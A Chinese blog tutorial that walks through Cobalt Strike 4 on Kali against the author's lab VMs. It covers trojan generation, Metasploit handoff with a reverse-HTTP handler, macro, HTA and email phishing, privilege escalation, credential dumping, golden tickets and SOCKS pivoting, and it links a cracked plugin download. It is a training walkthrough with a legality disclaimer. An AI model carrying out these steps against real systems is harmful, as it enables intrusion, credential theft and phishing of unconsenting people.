[内网渗透]CobaltStrike4在Kali系统中实际应用

admin管理员组

文章数量:1637658

本文中探讨的内容只作为网络安全渗透技术探讨与分享，示例中渗透的IP均为本人虚拟机，不可越过法律与道德的底线进行非法渗透。

软件介绍

Cobalt Strike是一款美国Red Team开发的渗透测试神器，这款工具也是目前红队用的最多一款工具，常被业界人称为CS。因为它拥有多种协议主机上线方式，其他的木马都是走的TCPIP协议，它DNS,SMB等协议它都支持，支持的协议比较多，而且功能也比较全面。集成了提权，凭据导出，端口转发，socket代理，office攻击，文件捆绑，钓鱼等功能，是一款APT攻击工具。

 Cobalt Strike最核心的功能是分为客户端和服务端可分布式操作可以协同作战，也就是说只需要一个公网服务器，把CS的服务端放在公网服务器上面，后面大家有密码的情况下都可以连接我的服务端 。控制一台服务器，但我提权能力比较弱，我可以找这方面能力强的一起针对这台服务器进行操作，这是这款工具最强大的功能。

目前其他的远控工具还不具备这种功能，它的运行很简单。

我们打开客户端的配置文件看一下代码。它默认的服务端的端口50050，但是大部分使用时会修改，因为大部分的防火墙会拦截这个端口。后面还有它的证书key。

服务端运行CS

1）将服务端文件丢到Kali系统中解压 cd进入到这文件夹中 执行

./teamserver 10.0.0.200 test

如果执行出现报错看看是不是没给权限

客户端运行CS

打开CS文件夹中cs.bat  输入IP 端口 用户名与密码（测试用的都是test）

如果遇到连接超时的情况，可以检查一下网络适配器 将VM禁用后再重新启用

 成功运行

客户端建立监听

添加监听器

这个是它的payload  生产木马就以这个payload生产  别人中了木马反向连接我这个主机 10.0.0.200:2222端口 

下面生成木马 针对windows系统有两个选项 

带s的是无状态的木马  生产出来的木马运行控制对方的服务器 但是它没有任何行为动作 不会创建服务 容易绕过杀毒软件的行为查杀 因为程序再运行的时候要调用注册表 例如写入到启动项 或者服务里面 无状态木马 开机不会自启动 他没有行为动作  它再运行的时候只在内存里   重启就没了  这样做免杀比较方便 

所以一般我们生成木马时 带服务启动 （示例中选择不带s的）

根据系统情况 选择是否64位

选择一个储存地址 我就存到了cs根目录下

此时启动一台windows2003虚拟机 将木马传到虚拟机运行 运行后虚拟机中没有反应  再CS客户端上方已经上线 

功能十分强大 可以进入beacon进入命令行操作

输入 ？ 回车 可以显示可以使用的命令 例如 ？cd

输入 shell ipconfig （首次使用命令行 回应会比较慢 耐心等一会）

第一次操作完以后 后面就快了    输入shell whoami

至此建立监听成功

但是木马以安装程序的形式留存在目标主机中容易暴露，可以将木马文件做一下修饰和免杀(跑题了 回来单写文章做介绍)

建立VNC远程连接

查看当前网络环境

查看当前网络环境下有多少主机

端口扫描

端口扫描 采用arp lcmp 这两个协议去探测 这两个协议内网很难发现

arp是底层协议 数据链路层的协议

内网下开了3389 的主机

查看当前主机的进程

伪造token值  提权的时候有用 其他的时候没啥用 

生成payload

为了方便免杀 可以生成各种语言的payload

MSF联动

借用msf强大的漏洞库  让CS控制的主机瞬间到MSF内

创建一个监听

kali打开msf

msf设置监听模块

use exploit/multi/handler

设置系统 这里客户端用的什么系统 写什么系统 （如果连接不成功 大概率是这里选择的payload 与 监听的payload不匹配）

set payload windows/meterpreter/reverse_http

设置攻击者ip

set lhost 10.0.0.200

成功反弹

把CS的会话迁移到MSF上面 因为MSF有强大的漏洞库 方便提权 内网渗透 

CS上面没有漏洞库  内网系统攻击的时候 都要把会话迁移到MSF上面打内网  

再MSF上执行一个命令试一下

至此 与MSF上的基础操作没有任何区别了

office钓鱼攻击

复制这些代码

找到word里的宏

“所有的活动模板和文档 ”种完木马以后它会影响电脑里所有的office文件 

针对某一个文档 久只选择对应的文档  

将刚复制的代码粘贴进来

保存关闭 当有人运行这个文档的时候 就会产长新的会话连接。

这里默认是低 但是如果是中 高 会出现安全提示

禁用 木马不会运行  启用 木马会运行 

高版本 

安全设置

防范方法：收到可疑文件出现提示“宏”，可以丢到虚拟机里去执行。更严谨的方法执行前做个备份。

忠告：做完这类的实验 一定要把“宏”删除，不然会闹出乌龙事件。

信息收集

将域名缩短【短链接在线生成】或者【站长之家】

粘贴到地址栏 按回车打开的是baidu的网站

打开web日志

可以捕捉到访问网站的主机指纹信息（不会进行攻击）

再做安全测试的时候可以 企业哪个员工访问了这个钓鱼连接 需要提醒该员工提高网络安全意识

再有渗透授权的情况下可以继续攻击 把木马传上去

生成html马

PowerShell 只作用与win7以上的系统 

生成后可以进行攻击

文件下载

hta 就是html  html的可执行文件 叫hta

http://10.0.0.200:82/download/file.ext

看一下卡里cobaltsreike4目录下 upload目录里有没有刚刚生成的木马文件

下一步进行网页钓鱼

HTTP网页钓鱼

这里https 不行就把s去掉 

生成短链接钓鱼 http://i7q/6wAFSS

开个虚拟机   win7以上  这个powershell只有win7系统以上才有 以下不支持

这个马还有一个缺陷  再IE浏览器可以直接执行 其他的还不行 会爆提示 要人为执行

这个是浏览器安全机制   点了下载文件 直接运行 就中招了

win10 edge浏览器

win10 IE浏览器

中招了  看一下键盘记录

邮件钓鱼

将目标邮箱写在记事本中  可以放很多邮箱地址  做实验就放一个 

邮件内容可以找一个已有的邮件导出为eml文件

将木马放在附件里  实验里随便放一个压缩包  附件做好免杀

预览一下看看有没有报错  然后发送 大厂邮箱有外链 有可能会被拦截 

提权

拿到普通用户权限的会话 对于有些功能会有限制  例如转储哈希值

可以在会话处右键点击提权

这些漏洞可以一个一个试   uac的概率会高一些   成功了会产生一个新的会话 

多试几个  可以拿shell whoami 查看权限成功提权后可以获取哈希值 和明文密码 

明文密码： 

黄金票据制作

有了黄金票据随时可以登录

中转SOCKS代理

双击 复制代理信息  到kali  整个msf 会走SOCKS代理  

默认是socks4代理  只能走tcp协议   还有socks5代理  可以走tcp和udp协议  其他的协议都不支持 所以建立连接后不用ping其他的主机  他们之间不支持这个协议  

攻击者如果控制了101主机 却控制不了102 103主机  在101主机建立SOCKS4代理 攻击者的流量发给101主机 转发给其他主机 因为他们属于同一交换机  在同一个网络里面 借用101为跳板去攻击102103主机 0203主机回包给01主机 在返回给攻击者

如果想让整个系统走socks代理 就要改它的配置文件 

后面的2222我没有改 这个是要根据获取socks代理时

设置的端口号 其他的不用变

 ========================================================================

如果能看得过去，能否赏个赞收关！

以上是正文干货，下方是拓展示例：

=========================================================================

CS的插件下载安装

GitHub - k8gege/Aggressor: Ladon 911 for Cobalt Strike & Cracked Download,Large Network Penetration Scanner, vulnerability / exploit / detection / MS17010 / password/brute-force/psexec/atexec/sshexec/webshell/smbexec/netcat/osscan/netscan/struts2Poc/weblogicExp

也有命令行操作  这是专门为内网渗透准备的插件

还有中文版 我给大家上传的文件包里包含一个英文原版插件，和汉化版插件，功能挺全面的集成插件，但是一些探测工具相较于专业的C语言写的小工具来讲，效率差一些，感兴趣的可以试一下，仅供学习交流使用，严禁非法渗透。

本文标签： 内网实际应用系统Kali